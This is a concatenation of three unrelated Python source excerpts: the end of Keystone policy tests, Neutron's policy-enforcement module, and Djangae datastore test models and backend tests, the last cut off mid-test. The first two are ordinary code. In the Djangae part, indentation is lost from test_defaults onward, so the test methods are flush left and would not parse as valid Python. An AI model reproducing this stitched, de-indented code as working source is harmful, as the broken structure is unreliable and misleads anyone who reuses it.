                       _DomainAndProjectUserPolicyTests):

    def setUp(self):
        """Authenticate as the bootstrap admin with a project-scoped token."""
        super(ProjectUserTests, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))
        self.config_fixture.config(group='oslo_policy', enforce_scope=True)

        # The admin user itself is used here; the mixin asserts that a
        # project-scoped token is still denied access to policy APIs.
        self.user_id = self.bootstrapper.admin_user_id
        auth = self.build_authentication_request(
            user_id=self.user_id,
            password=self.bootstrapper.admin_password,
            project_id=self.bootstrapper.project_id
        )

        # Issue a token for this persona once and reuse it in every test.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}
class ProjectUserTestsWithoutEnforceScope(
        base_classes.TestCaseWithBootstrap,
        common_auth.AuthTestMixin,
        _DomainAndProjectUserPolicyTests):

    def setUp(self):
        """Authenticate as a project member with scope enforcement off."""
        super(ProjectUserTestsWithoutEnforceScope, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))

        # Explicitly set enforce_scope to False to make sure we maintain
        # backwards compatibility with project users.
        self.config_fixture.config(group='oslo_policy', enforce_scope=False)

        domain = PROVIDERS.resource_api.create_domain(
            uuid.uuid4().hex, unit.new_domain_ref()
        )
        user_ref = unit.new_user_ref(domain_id=domain['id'])
        self.user_id = PROVIDERS.identity_api.create_user(user_ref)['id']

        self.project_id = PROVIDERS.resource_api.create_project(
            uuid.uuid4().hex, unit.new_project_ref(domain_id=domain['id'])
        )['id']
        PROVIDERS.assignment_api.create_grant(
            self.bootstrapper.member_role_id, user_id=self.user_id,
            project_id=self.project_id
        )

        auth = self.build_authentication_request(
            user_id=self.user_id,
            password=user_ref['password'],
            project_id=self.project_id
        )

        # Issue a token for this persona once and reuse it in every test.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Policy engine for neutron. Largely copied from nova.
"""
import itertools
import re
from oslo.config import cfg
from neutron.api.v2 import attributes
from neutron.common import exceptions
import neutron.common.utils as utils
from neutron import manager
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import policy
LOG = logging.getLogger(__name__)

# Cached location and contents of the policy file; populated by init()
# and cleared by reset().
_POLICY_PATH = None
_POLICY_CACHE = {}
# Name of the policy rule that identifies an administrative context.
ADMIN_CTX_POLICY = 'context_is_admin'
# Maps deprecated 'extension' policies to new-style policies
DEPRECATED_POLICY_MAP = {
    'extension:provider_network':
    ['network:provider:network_type',
     'network:provider:physical_network',
     'network:provider:segmentation_id'],
    'extension:router':
    ['network:router:external'],
    'extension:port_binding':
    ['port:binding:vif_type', 'port:binding:capabilities',
     'port:binding:profile', 'port:binding:host_id']
}
# Maps deprecated 'view'/'set' action aliases onto real CRUD actions.
DEPRECATED_ACTION_MAP = {
    'view': ['get'],
    'set': ['create', 'update']
}

cfg.CONF.import_opt('policy_file', 'neutron.common.config')
def reset():
    """Drop the cached policy file path/contents and reset the engine."""
    global _POLICY_PATH, _POLICY_CACHE
    policy.reset()
    _POLICY_PATH = None
    _POLICY_CACHE = {}
def init():
    """Locate the policy file and (re)load rules if it changed on disk.

    The resolved path is cached in the module-level _POLICY_PATH;
    read_cached_file only re-parses (via _set_rules) when the file's
    contents differ from _POLICY_CACHE.

    :raises exceptions.PolicyFileNotFound: if the configured policy file
        cannot be located.
    """
    global _POLICY_PATH
    global _POLICY_CACHE
    if not _POLICY_PATH:
        _POLICY_PATH = utils.find_config_file({}, cfg.CONF.policy_file)
        if not _POLICY_PATH:
            raise exceptions.PolicyFileNotFound(path=cfg.CONF.policy_file)
    # pass _set_brain to read_cached_file so that the policy brain
    # is reset only if the file has changed
    utils.read_cached_file(_POLICY_PATH, _POLICY_CACHE,
                           reload_func=_set_rules)
def get_resource_and_action(action):
    """Split an API operation into (plural resource name, is_write).

    For example 'create_network:shared' -> ('networks', True) and
    'get_port' -> ('ports', False); only 'get_*' operations count as reads.
    """
    base = action.split(':', 1)[0]
    verb_and_resource = base.split('_', 1)
    resource = "%ss" % verb_and_resource[-1]
    is_write = verb_and_resource[0] != 'get'
    return (resource, is_write)
def _set_rules(data):
    """Parse policy *data* (JSON text) and install it as the active rules.

    Deprecated folsom/grizzly 'extension:*' rules with 'view'/'set'
    actions are translated into their new-style equivalents so old
    policy files keep working.
    """
    default_rule = 'default'
    LOG.debug(_("loading policies from file: %s"), _POLICY_PATH)
    # Ensure backward compatibility with folsom/grizzly convention
    # for extension rules
    policies = policy.Rules.load_json(data, default_rule)
    # NOTE(review): iterating over .keys() appears to rely on it being a
    # snapshot (a list on Python 2), which makes the del below safe during
    # iteration — confirm before porting to Python 3.
    for pol in policies.keys():
        if any([pol.startswith(depr_pol) for depr_pol in
                DEPRECATED_POLICY_MAP.keys()]):
            LOG.warn(_("Found deprecated policy rule:%s. Please consider "
                       "upgrading your policy configuration file"), pol)
            pol_name, action = pol.rsplit(':', 1)
            try:
                new_actions = DEPRECATED_ACTION_MAP[action]
                new_policies = DEPRECATED_POLICY_MAP[pol_name]
                # bind new actions and policies together
                for actual_policy in ['_'.join(item) for item in
                                      itertools.product(new_actions,
                                                        new_policies)]:
                    if actual_policy not in policies:
                        # New policy, same rule
                        LOG.info(_("Inserting policy:%(new_policy)s in place "
                                   "of deprecated policy:%(old_policy)s"),
                                 {'new_policy': actual_policy,
                                  'old_policy': pol})
                        policies[actual_policy] = policies[pol]
                # Remove old-style policy
                del policies[pol]
            except KeyError:
                # Unknown deprecated action or policy name: keep the old
                # rule in place but warn that it will not be enforced.
                LOG.error(_("Backward compatibility unavailable for "
                            "deprecated policy %s. The policy will "
                            "not be enforced"), pol)
    policy.set_rules(policies)
def _is_attribute_explicitly_set(attribute_name, resource, target):
    """Verify that an attribute is present and has a non-default value."""
    spec = resource[attribute_name]
    if 'default' not in spec:
        return False
    if attribute_name not in target:
        return False
    value = target[attribute_name]
    return (value is not attributes.ATTR_NOT_SPECIFIED and
            value != spec['default'])
def _build_subattr_match_rule(attr_name, attr, action, target):
    """Create the rule to match for sub-attribute policy checks.

    Returns an AndCheck over one rule per sub-attribute present in the
    request target (e.g. create_router:external_gateway_info:network_id),
    or None when no usable 'type:dict' descriptor can be found.
    """
    # TODO(salv-orlando): Instead of relying on validator info, introduce
    # typing for API attributes
    # Expect a dict as type descriptor
    validate = attr['validate']
    # NOTE(review): filter() returns a list here (Python 2 semantics); the
    # key[0] subscript below would need list(filter(...)) on Python 3.
    key = filter(lambda k: k.startswith('type:dict'), validate.keys())
    if not key:
        LOG.warn(_("Unable to find data type descriptor for attribute %s"),
                 attr_name)
        return
    data = validate[key[0]]
    if not isinstance(data, dict):
        LOG.debug(_("Attribute type descriptor is not a dict. Unable to "
                    "generate any sub-attr policy rule for %s."),
                  attr_name)
        return
    # One rule per declared sub-attribute actually present in the target.
    sub_attr_rules = [policy.RuleCheck('rule', '%s:%s:%s' %
                                       (action, attr_name,
                                        sub_attr_name)) for
                      sub_attr_name in data if sub_attr_name in
                      target[attr_name]]
    return policy.AndCheck(sub_attr_rules)
def _build_match_rule(action, target):
    """Create the rule to match for a given action.

    The policy rule to be matched is built in the following way:
    1) add entries for matching permission on objects
    2) add an entry for the specific action (e.g.: create_network)
    3) add an entry for attributes of a resource for which the action
       is being executed (e.g.: create_network:shared)
    4) add an entry for sub-attributes of a resource for which the
       action is being executed
       (e.g.: create_router:external_gateway_info:network_id)
    """
    match_rule = policy.RuleCheck('rule', action)
    resource, is_write = get_resource_and_action(action)
    # Attribute-based checks shall not be enforced on GETs
    if is_write:
        # assigning to variable with short name for improving readability
        res_map = attributes.RESOURCE_ATTRIBUTE_MAP
        if resource in res_map:
            for attribute_name in res_map[resource]:
                # Only attributes explicitly supplied with a non-default
                # value contribute extra rules to the match.
                if _is_attribute_explicitly_set(attribute_name,
                                                res_map[resource],
                                                target):
                    attribute = res_map[resource][attribute_name]
                    if 'enforce_policy' in attribute:
                        attr_rule = policy.RuleCheck('rule', '%s:%s' %
                                                     (action, attribute_name))
                        # Build match entries for sub-attributes, if present
                        validate = attribute.get('validate')
                        if (validate and any([k.startswith('type:dict') and v
                                              for (k, v) in
                                              validate.iteritems()])):
                            attr_rule = policy.AndCheck(
                                [attr_rule, _build_subattr_match_rule(
                                    attribute_name, attribute,
                                    action, target)])
                        # Each attribute rule is ANDed onto the base rule.
                        match_rule = policy.AndCheck([match_rule, attr_rule])
    return match_rule
# This check is registered as 'tenant_id' so that it can override
# GenericCheck which was used for validating parent resource ownership.
# This will prevent us from having to handling backward compatibility
# for policy.json
# TODO(salv-orlando): Reinstate GenericCheck for simple tenant_id checks
@policy.register('tenant_id')
class OwnerCheck(policy.Check):
    """Resource ownership check.

    This check verifies the owner of the current resource, or of another
    resource referenced by the one under analysis.
    In the former case it falls back to a regular GenericCheck, whereas
    in the latter case it leverages the plugin to load the referenced
    resource and perform the check.
    """

    def __init__(self, kind, match):
        # Process the match: extract the field name from a
        # '%(<field_name>)s' substitution pattern.
        # NOTE(review): the pattern is not a raw string; '\%' and '\(' are
        # harmless but would be cleaner as r'^\%\((.*)\)s$'.
        try:
            self.target_field = re.findall('^\%\((.*)\)s$',
                                           match)[0]
        except IndexError:
            err_reason = (_("Unable to identify a target field from:%s."
                            "match should be in the form %%(<field_name>)s") %
                          match)
            LOG.exception(err_reason)
            raise exceptions.PolicyInitError(
                policy="%s:%s" % (kind, match),
                reason=err_reason)
        super(OwnerCheck, self).__init__(kind, match)

    def __call__(self, target, creds):
        if self.target_field not in target:
            # policy needs a plugin check
            # target field is in the form resource:field
            # however if they're not separated by a colon, use an underscore
            # as a separator for backward compatibility
            def do_split(separator):
                parent_res, parent_field = self.target_field.split(
                    separator, 1)
                return parent_res, parent_field

            # The for/else below runs the else branch only when neither
            # separator produced a successful split.
            for separator in (':', '_'):
                try:
                    parent_res, parent_field = do_split(separator)
                    break
                except ValueError:
                    LOG.debug(_("Unable to find ':' as separator in %s."),
                              self.target_field)
            else:
                # If we are here split failed with both separators
                err_reason = (_("Unable to find resource name in %s") %
                              self.target_field)
                LOG.exception(err_reason)
                raise exceptions.PolicyCheckError(
                    policy="%s:%s" % (self.kind, self.match),
                    reason=err_reason)
            parent_foreign_key = attributes.RESOURCE_FOREIGN_KEYS.get(
                "%ss" % parent_res, None)
            if not parent_foreign_key:
                err_reason = (_("Unable to verify match:%(match)s as the "
                                "parent resource: %(res)s was not found") %
                              {'match': self.match, 'res': parent_res})
                LOG.exception(err_reason)
                raise exceptions.PolicyCheckError(
                    policy="%s:%s" % (self.kind, self.match),
                    reason=err_reason)
            # NOTE(salv-orlando): This check currently assumes the parent
            # resource is handled by the core plugin. It might be worth
            # having a way to map resources to plugins so to make this
            # check more general
            f = getattr(manager.NeutronManager.get_instance().plugin,
                        'get_%s' % parent_res)
            # f *must* exist, if not found it is better to let neutron
            # explode. Check will be performed with admin context
            context = importutils.import_module('neutron.context')
            try:
                # Fetch the referenced field from the parent resource and
                # cache it on the target for the final comparison below.
                data = f(context.get_admin_context(),
                         target[parent_foreign_key],
                         fields=[parent_field])
                target[self.target_field] = data[parent_field]
            except Exception:
                LOG.exception(_('Policy check error while calling %s!'), f)
                raise
        match = self.match % target
        if self.kind in creds:
            return match == unicode(creds[self.kind])
        return False
@policy.register('field')
class FieldCheck(policy.Check):
    """Compare a field of the request target against a literal value.

    The match string has the form '<resource>:<field>=<value>'; the value
    is converted using the attribute map's 'convert_to' hook when one is
    declared for the field.
    """

    def __init__(self, kind, match):
        # Process the match
        resource, field_value = match.split(':', 1)
        field, value = field_value.split('=', 1)
        super(FieldCheck, self).__init__(kind, '%s:%s:%s' %
                                         (resource, field, value))

        # Value might need conversion - we need help from the attribute map
        try:
            attr = attributes.RESOURCE_ATTRIBUTE_MAP[resource][field]
            conv_func = attr['convert_to']
        except KeyError:
            # No converter declared: compare the raw string value.
            conv_func = lambda x: x

        self.field = field
        self.value = conv_func(value)

    def __call__(self, target_dict, cred_dict):
        target_value = target_dict.get(self.field)
        # target_value might be a boolean, explicitly compare with None
        if target_value is None:
            LOG.debug(_("Unable to find requested field: %(field)s in "
                        "target: %(target_dict)s"),
                      {'field': self.field,
                       'target_dict': target_dict})
            return False
        return target_value == self.value
def _prepare_check(context, action, target):
    """Prepare rule, target, and credentials for the policy engine."""
    init()
    # Compare with None to distinguish case in which target is {}
    if target is None:
        target = {}
    rule = _build_match_rule(action, target)
    return rule, target, context.to_dict()
def check(context, action, target, plugin=None):
    """Verifies that the action is valid on the target in this context.

    :param context: neutron context
    :param action: string representing the action to be checked
        this should be colon separated for clarity.
    :param target: dictionary representing the object of the action
        for object creation this should be a dictionary representing the
        location of the object e.g. ``{'project_id': context.project_id}``
    :param plugin: currently unused and deprecated.
        Kept for backward compatibility.

    :return: Returns True if access is permitted else False.
    """
    rule, checked_target, credentials = _prepare_check(context, action, target)
    return policy.check(rule, checked_target, credentials)
def check_if_exists(context, action, target):
    """Verify if the action can be authorized, and raise if it is unknown.

    Check whether the action can be performed on the target within this
    context, and raise a PolicyRuleNotFound exception if the action is
    not defined in the policy engine.
    """
    # TODO(salvatore-orlando): Consider modifying oslo policy engine in
    # order to allow to raise distinct exception when check fails and
    # when policy is missing
    # Raise if there's no match for requested action in the policy engine
    rules = policy._rules
    if not rules or action not in rules:
        raise exceptions.PolicyRuleNotFound(rule=action)
    rule, checked_target, credentials = _prepare_check(context, action, target)
    return policy.check(rule, checked_target, credentials)
def enforce(context, action, target, plugin=None):
    """Verifies that the action is valid on the target in this context.

    :param context: neutron context
    :param action: string representing the action to be checked
        this should be colon separated for clarity.
    :param target: dictionary representing the object of the action
        for object creation this should be a dictionary representing the
        location of the object e.g. ``{'project_id': context.project_id}``
    :param plugin: currently unused and deprecated.
        Kept for backward compatibility.

    :raises neutron.exceptions.PolicyNotAllowed: if verification fails.
    """
    init()
    rule, checked_target, credentials = _prepare_check(context, action, target)
    # Unlike check(), failures raise PolicyNotAuthorized instead of
    # returning False.
    return policy.check(rule, checked_target, credentials,
                        exc=exceptions.PolicyNotAuthorized, action=action)
def check_is_admin(context):
    """Verify context has admin rights according to policy settings."""
    init()
    # the target is user-self
    credentials = context.to_dict()
    target = credentials
    # Backward compatibility: if ADMIN_CTX_POLICY is not
    # found, default to validating role:admin.
    # NOTE: the original used the fragile ``cond and a or b`` idiom; an
    # explicit conditional is equivalent here and cannot silently break
    # if the truthy assumption about the first operand ever changes.
    if ADMIN_CTX_POLICY in policy._rules:
        admin_policy = ADMIN_CTX_POLICY
    else:
        admin_policy = 'role:admin'
    return policy.check(admin_policy, target, credentials)
def _extract_roles(rule, roles):
    """Recursively append role names referenced by a policy rule tree."""
    if isinstance(rule, policy.RoleCheck):
        roles.append(rule.match.lower())
        return
    if isinstance(rule, policy.RuleCheck):
        # Follow the reference to the named rule and recurse into it.
        _extract_roles(policy._rules[rule.match], roles)
        return
    if hasattr(rule, 'rules'):
        # Composite check: walk every child rule.
        for child in rule.rules:
            _extract_roles(child, roles)
def get_admin_roles():
    """Return a list of roles which are granted admin rights according
    to policy settings.
    """
    # NOTE(salvatore-orlando): This function provides a solution for
    # populating implicit contexts with the appropriate roles so that
    # they correctly pass policy checks, and will become superseded
    # once all explicit policy checks are removed from db logic and
    # plugin modules. For backward compatibility it returns the literal
    # admin if ADMIN_CTX_POLICY is not defined
    init()
    if not policy._rules or ADMIN_CTX_POLICY not in policy._rules:
        return ['admin']
    # NOTE(review): after the membership check above the KeyError branch
    # looks unreachable; confirm before simplifying this defensive fetch.
    try:
        admin_ctx_rule = policy._rules[ADMIN_CTX_POLICY]
    except (KeyError, TypeError):
        return
    roles = []
    _extract_roles(admin_ctx_rule, roles)
    return roles
| |
import datetime
import decimal
import re
import random
from cStringIO import StringIO
from string import letters
from hashlib import md5
# LIBRARIES
from django.core.files.uploadhandler import StopFutureHandlers
from django.core.cache import cache
from django.core.exceptions import ValidationError
from django.db import DataError, models
from django.db.models.query import Q
from django.forms import ModelForm
from django.test import RequestFactory
from django.utils.safestring import SafeText
from django.forms.models import modelformset_factory
from google.appengine.api.datastore_errors import EntityNotFoundError, BadValueError
from google.appengine.api import datastore
from google.appengine.ext import deferred
from google.appengine.api import taskqueue
from django.test.utils import override_settings
from django.core.exceptions import FieldError
from django.template import Template, Context
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import inconsistent_db, TestCase
from django.db import IntegrityError, NotSupportedError
from djangae.db.constraints import UniqueMarker, UniquenessMixin
from djangae.db.unique_utils import _unique_combinations, unique_identifiers_from_entity
from djangae.db.backends.appengine.indexing import add_special_index
from djangae.db.utils import entity_matches_query, decimal_to_string, normalise_field_value
from djangae.db.caching import disable_cache
from djangae.fields import SetField, ListField, RelatedSetField
from djangae.storage import BlobstoreFileUploadHandler
from djangae.core import paginator
# webtest is an optional dependency; tests needing it should check for
# the NotImplemented sentinel before use.
try:
    import webtest
except ImportError:
    webtest = NotImplemented
class TestUser(models.Model):
    """Simple user model used as a relation target throughout these tests."""
    username = models.CharField(max_length=32)
    email = models.EmailField()
    last_login = models.DateField(auto_now_add=True)
    field2 = models.CharField(max_length=32)

    def __unicode__(self):
        return self.username

    class Meta:
        app_label = "djangae"


class ModelWithNullableCharField(models.Model):
    """Model exercising nullable CharField behaviour."""
    field1 = models.CharField(max_length=500, null=True)
    some_id = models.IntegerField(default=0)

    class Meta:
        app_label = "djangae"


class UniqueModel(models.Model):
    """Model covering uniqueness flavours: single-field, unique FK,
    unique Set/List fields and unique_together combinations."""
    unique_field = models.CharField(max_length=100, unique=True)
    unique_combo_one = models.IntegerField(blank=True, default=0)
    unique_combo_two = models.CharField(max_length=100, blank=True, default="")
    unique_relation = models.ForeignKey('self', null=True, blank=True, unique=True)
    unique_set_field = SetField(models.CharField(max_length=500), unique=True)
    unique_list_field = ListField(models.CharField(max_length=500), unique=True)
    unique_together_list_field = ListField(models.IntegerField())

    class Meta:
        unique_together = [
            ("unique_combo_one", "unique_combo_two"),
            ("unique_together_list_field", "unique_combo_one")
        ]

        app_label = "djangae"


class UniqueModelWithLongPK(models.Model):
    """Model with a long CharField primary key plus a unique field."""
    # NOTE(review): unlike the other models in this module this one
    # declares no Meta.app_label — confirm that is intentional.
    long_pk = models.CharField(max_length=500, primary_key=True)
    unique_field = models.IntegerField(unique=True)


class IntegerModel(models.Model):
    """Model holding a single required integer."""
    integer_field = models.IntegerField()

    class Meta:
        app_label = "djangae"
class TestFruit(models.Model):
    """Model with a CharField primary key, a field default and default
    queryset ordering."""
    name = models.CharField(primary_key=True, max_length=32)
    origin = models.CharField(max_length=32, default="Unknown")
    color = models.CharField(max_length=100)
    is_mouldy = models.BooleanField(default=False)

    class Meta:
        # Default queryset ordering by color.
        ordering = ("color",)
        app_label = "djangae"

    def __unicode__(self):
        return self.name

    def __repr__(self):
        return "<TestFruit: name={}, color={}>".format(self.name, self.color)


class Permission(models.Model):
    """Model with a ForeignKey and ordering that traverses the relation."""
    user = models.ForeignKey(TestUser)
    perm = models.CharField(max_length=32)

    def __unicode__(self):
        return u"{0} for {1}".format(self.perm, self.user)

    class Meta:
        # Ordering crosses the FK (user__username) before falling back
        # to the local 'perm' field.
        ordering = ('user__username', 'perm')
        app_label = "djangae"


class SelfRelatedModel(models.Model):
    """Model with an optional self-referencing foreign key."""
    related = models.ForeignKey('self', blank=True, null=True)

    class Meta:
        app_label = "djangae"
class MultiTableParent(models.Model):
    """Base model for multi-table inheritance tests."""
    parent_field = models.CharField(max_length=32)

    class Meta:
        app_label = "djangae"


class MultiTableChildOne(MultiTableParent):
    """First concrete child of MultiTableParent."""
    child_one_field = models.CharField(max_length=32)

    class Meta:
        app_label = "djangae"


class MultiTableChildTwo(MultiTableParent):
    """Second concrete child of MultiTableParent."""
    child_two_field = models.CharField(max_length=32)

    class Meta:
        app_label = "djangae"


class Relation(models.Model):
    """Empty model acting purely as a ForeignKey target."""
    class Meta:
        app_label = "djangae"


class Related(models.Model):
    """Model pointing at Relation."""
    headline = models.CharField(max_length=500)
    relation = models.ForeignKey(Relation)

    class Meta:
        app_label = "djangae"


class NullDate(models.Model):
    """Model with nullable date/datetime/time fields defaulting to None."""
    date = models.DateField(null=True, default=None)
    datetime = models.DateTimeField(null=True, default=None)
    time = models.TimeField(null=True, default=None)

    class Meta:
        app_label = "djangae"


class NullDateSet(models.Model):
    """Model holding a unique set of NullDate references."""
    dates = RelatedSetField(NullDate, blank=True, unique=True)

    class Meta:
        app_label = "djangae"
class ModelWithUniques(models.Model):
    """Model with a single unique CharField."""
    name = models.CharField(max_length=64, unique=True)

    class Meta:
        app_label = "djangae"


class ModelWithUniquesOnForeignKey(models.Model):
    """Model combining a unique field, a unique FK and unique_together."""
    name = models.CharField(max_length=64, unique=True)
    related_name = models.ForeignKey(ModelWithUniques, unique=True)

    class Meta:
        unique_together = [("name", "related_name")]
        app_label = "djangae"


class ModelWithDates(models.Model):
    """Model with a required start/end date pair."""
    start = models.DateField()
    end = models.DateField()

    class Meta:
        app_label = "djangae"


class ModelWithUniquesAndOverride(models.Model):
    """Model configuring constraint checking via the Djangae inner class."""
    name = models.CharField(max_length=64, unique=True)

    class Djangae:
        # Djangae-specific switch: keep unique-constraint checking enabled.
        disable_constraint_checks = False

    class Meta:
        app_label = "djangae"


class SpecialIndexesModel(models.Model):
    """Model used by the special-index tests."""
    name = models.CharField(max_length=255)
    # NOTE(review): ListField receives the CharField *class* rather than an
    # instance here — confirm djangae accepts an un-instantiated field.
    sample_list = ListField(models.CharField)

    def __unicode__(self):
        return self.name

    class Meta:
        app_label = "djangae"


class DateTimeModel(models.Model):
    """Model with auto_now_add datetime and date fields."""
    datetime_field = models.DateTimeField(auto_now_add=True)
    date_field = models.DateField(auto_now_add=True)

    class Meta:
        app_label = "djangae"


class PaginatorModel(models.Model):
    """Model with one integer, used by the paginator tests."""
    foo = models.IntegerField()

    class Meta:
        app_label = "djangae"
class BackendTests(TestCase):
    def test_entity_matches_query(self):
        """entity_matches_query must honour the =, >=, < and <= operators
        and match list properties when any element satisfies the filter."""
        entity = datastore.Entity("test_model")
        entity["name"] = "Charlie"
        entity["age"] = 22

        query = datastore.Query("test_model")
        query["name ="] = "Charlie"
        self.assertTrue(entity_matches_query(entity, query))

        # age 22 satisfies >= 5.
        query["age >="] = 5
        self.assertTrue(entity_matches_query(entity, query))
        del query["age >="]

        # age 22 does not satisfy < 22 (strict).
        query["age <"] = 22
        self.assertFalse(entity_matches_query(entity, query))
        del query["age <"]

        # ...but does satisfy <= 22 (inclusive).
        query["age <="] = 22
        self.assertTrue(entity_matches_query(entity, query))
        del query["age <="]

        query["name ="] = "Fred"
        self.assertFalse(entity_matches_query(entity, query))

        # If the entity has a list field, then if any of them match the
        # query then it's a match
        entity["name"] = [ "Bob", "Fred", "Dave" ]
        self.assertTrue(entity_matches_query(entity, query))  # ListField test
def test_defaults(self):
fruit = TestFruit.objects.create(name="Apple", color="Red")
self.assertEqual("Unknown", fruit.origin)
instance = datastore.Get(datastore.Key.from_path(TestFruit._meta.db_table, fruit.pk))
del instance["origin"]
datastore.Put(instance)
fruit = TestFruit.objects.get()
self.assertIsNone(fruit.origin)
fruit.save()
fruit = TestFruit.objects.get()
self.assertEqual("Unknown", fruit.origin)
@disable_cache()
def test_get_by_keys(self):
colors = [ "Red", "Green", "Blue", "Yellow", "Orange" ]
fruits = [ TestFruit.objects.create(name=str(x), color=random.choice(colors)) for x in range(32) ]
# Check that projections work with key lookups
with sleuth.watch('google.appengine.api.datastore.Query.__init__') as query_init:
with sleuth.watch('google.appengine.api.datastore.Query.Ancestor') as query_anc:
TestFruit.objects.only("color").get(pk="0").color
self.assertEqual(query_init.calls[0].kwargs["projection"], ["color"])
# Make sure the query is an ancestor of the key
self.assertEqual(query_anc.calls[0].args[1], datastore.Key.from_path(TestFruit._meta.db_table, "0"))
# Now check projections work with more than 30 things
with sleuth.watch('google.appengine.api.datastore.MultiQuery.__init__') as query_init:
with sleuth.watch('google.appengine.api.datastore.Query.Ancestor') as query_anc:
keys = [str(x) for x in range(32)]
results = list(TestFruit.objects.only("color").filter(pk__in=keys).order_by("name"))
self.assertEqual(query_init.call_count, 2) # Two multi queries
self.assertEqual(query_anc.call_count, 32) # 32 Ancestor calls
self.assertEqual(len(query_init.calls[0].args[1]), 30)
self.assertEqual(len(query_init.calls[1].args[1]), 2)
# Confirm the ordering is correct
self.assertEqual(sorted(keys), [ x.pk for x in results ])
results = list(TestFruit.objects.only("color").filter(pk__in=keys).order_by("name")[5:10])
self.assertEqual(len(results), 5)
self.assertEqual([x.pk for x in results], sorted(keys)[5:10])
# Make sure we can do a normal (non-projection) get by keys
self.assertItemsEqual(TestFruit.objects.filter(pk__in=keys), fruits)
def test_get_or_create(self):
"""
Django's get_or_create can do the following:
1. get(**lookup) -> throws DoesNotExist
2. Catches DoesNotExist
3. create() -> throws IntegrityError
4. get(**lookup)
This test proves that we throw the right kind of error at step 3 when
unique constraints are violated.
"""
def wrap_get(func):
def _wrapped(*args, **kwargs):
try:
if _wrapped.calls == 0:
raise UniqueModel.DoesNotExist()
else:
return func(*args, **kwargs)
finally:
_wrapped.calls += 1
_wrapped.calls = 0
return _wrapped
from django.db.models import query
wrapped_get = wrap_get(query.QuerySet.get)
UniqueModel.objects.create(unique_field="Test")
with disable_cache():
with sleuth.switch("django.db.models.query.QuerySet.get", wrapped_get):
instance, created = UniqueModel.objects.get_or_create(unique_field="Test")
self.assertFalse(created)
def test_setting_non_null_null_throws_integrity_error(self):
with self.assertRaises(IntegrityError):
IntegerModel.objects.create(integer_field=None)
with self.assertRaises(IntegrityError):
instance = IntegerModel()
instance.integer_field = None
instance.save()
with self.assertRaises(IntegrityError):
instance = IntegerModel.objects.create(integer_field=1)
instance = IntegerModel.objects.get()
instance.integer_field = None
instance.save()
def test_normalise_field_value(self):
self.assertEqual(u'0000475231073257', normalise_field_value(decimal.Decimal(475231073257)))
self.assertEqual(u'-0000475231073257', normalise_field_value(decimal.Decimal(-475231073257)))
self.assertEqual(u'0000000004752311', normalise_field_value(decimal.Decimal(4752310.73257)))
self.assertEqual(u'0000004752310733', normalise_field_value(decimal.Decimal(4752310732.57)))
self.assertEqual(datetime.datetime(2015, 1, 27, 2, 46, 8, 584258), normalise_field_value(datetime.datetime(2015, 1, 27, 2, 46, 8, 584258)))
def test_decimal_to_string(self):
self.assertEqual(u'0002312487812767', decimal_to_string(decimal.Decimal(2312487812767)))
self.assertEqual(u'-0002312487812767', decimal_to_string(decimal.Decimal(-2312487812767)))
self.assertEqual(u'002312487812', decimal_to_string(decimal.Decimal(2312487812), 12))
self.assertEqual(u'002387812.320', decimal_to_string(decimal.Decimal(2387812.32), 12, 3))
self.assertEqual(u'-002387812.513', decimal_to_string(decimal.Decimal(-2387812.513212), 12, 3))
self.assertEqual(u'0237812.000', decimal_to_string(decimal.Decimal(237812), 10, 3))
self.assertEqual(u'-0237812.210', decimal_to_string(decimal.Decimal(-237812.21), 10, 3))
def test_gae_conversion(self):
# A PK IN query should result in a single get by key
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Get", lambda *args, **kwargs: []) as get_mock:
list(TestUser.objects.filter(pk__in=[1, 2, 3])) # Force the query to run
self.assertEqual(1, get_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Query.Run", lambda *args, **kwargs: []) as query_mock:
list(TestUser.objects.filter(username="test"))
self.assertEqual(1, query_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.MultiQuery.Run", lambda *args, **kwargs: []) as query_mock:
list(TestUser.objects.filter(username__in=["test", "cheese"]))
self.assertEqual(1, query_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Get", lambda *args, **kwargs: []) as get_mock:
list(TestUser.objects.filter(pk=1))
self.assertEqual(1, get_mock.call_count)
#FIXME: Issue #80
with self.assertRaises(NotSupportedError):
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.MultiQuery.Run", lambda *args, **kwargs: []) as query_mock:
list(TestUser.objects.exclude(username__startswith="test"))
self.assertEqual(1, query_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Get", lambda *args, **kwargs: []) as get_mock:
list(TestUser.objects.filter(pk__in=[1, 2, 3, 4, 5, 6, 7, 8]).
filter(username__in=["test", "test2", "test3"]).filter(email__in=["test@example.com", "test2@example.com"]))
self.assertEqual(1, get_mock.call_count)
def test_range_behaviour(self):
IntegerModel.objects.create(integer_field=5)
IntegerModel.objects.create(integer_field=10)
IntegerModel.objects.create(integer_field=15)
self.assertItemsEqual([10], IntegerModel.objects.filter(integer_field__range=(6, 14)).values_list("integer_field", flat=True))
self.assertItemsEqual([5, 10, 15], IntegerModel.objects.filter(integer_field__range=(5, 15)).order_by("integer_field").values_list("integer_field", flat=True))
self.assertItemsEqual([5, 15], IntegerModel.objects.exclude(integer_field__range=(6, 14)).values_list("integer_field", flat=True))
def test_exclude_nullable_field(self):
instance = ModelWithNullableCharField.objects.create(some_id=999) # Create a nullable thing
